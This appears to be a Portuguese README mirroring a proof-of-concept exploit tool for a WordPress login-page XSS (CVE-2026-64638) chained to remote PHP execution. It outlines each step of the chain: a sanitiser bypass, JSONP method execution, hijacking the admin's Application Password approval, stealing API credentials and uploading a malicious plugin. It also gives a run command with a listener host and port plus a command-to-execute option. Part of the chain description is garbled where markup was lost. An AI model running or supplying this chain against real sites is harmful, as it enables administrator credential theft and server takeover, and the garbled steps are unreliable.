
# XSS2Shell (CVE-2026-64638) Espelho de PoC de XSS pré-autenticação para RCE no WordPress — WordSec, MIT; para testes de segurança autorizados
Imagem de distribuição do HackSpeak. Este repositório é uma imagem de distribuição do PoC educacional XSS2Shell (CVE-2026-64638) publicado pela WordSec, com código idêntico ao upstream; upstream sob Licença MIT, Copyright (c) 2026 WordSec.
⚠️ Exclusivamente para pesquisa de segurança e testes autorizados; execute apenas em sites WordPress que você possua ou para os quais possua autorização formal por escrito; o PoC gera e remove publicações temporárias — não o utilize contra administradores de terceiros ou sistemas de produção.
XSS2Shell (CVE-2026-64638) é um XSS refletido pré-autenticação na página de login do WordPress (wp-login.php), que pode ser elevado por uma cadeia completa até execução de código PHP no servidor (RCE).
strip_tags() do PHP e o KSES do WordPress (wp_kses_post()) — ao inserir um espaço entre < e o nome da tag (ex.: ), o primeiro trata como texto comum e preserva, enquanto o segundo interpreta como elemento HTML válido (// estão todos na allowlist);< area<area><div><button>ajaxurl → user-profile.js nativo da página de login dispara automaticamente um POST jQuery → REST API JSONP (_jsonp) → Same Origin Method Execution (SOME, Paulos Yibelo 2022) → cliques entre janelas no botão de autorização de Application Password do administrador → roubo das credenciais da API → publicação de uma página contendo <script> → upload de plugin ZIP malicioso → execução direta de PHP (sem necessidade de ativação);python3 xss2shell_poc.py -t http://wordpress.test --lhost 192.168.1.100 --lport 8080 -c "whoami"
| Parâmetro | Descrição |
|---|---|
-t, --target | Endereço base do WordPress (com http/https, normalização automática da barra final) |
-c, --command | Comando a executar quando o shell estiver pronto |
--lhost / --lport | Endereço/porta de escuta (lport 0 = aleatório) |
--keep | Mantém a página temporária de publicação (por padrão é removida) |
Dependências: Python 3.7+, zero pacotes de terceiros; requer login de administrador no site alvo e abertura da URL do atacante (uma interação).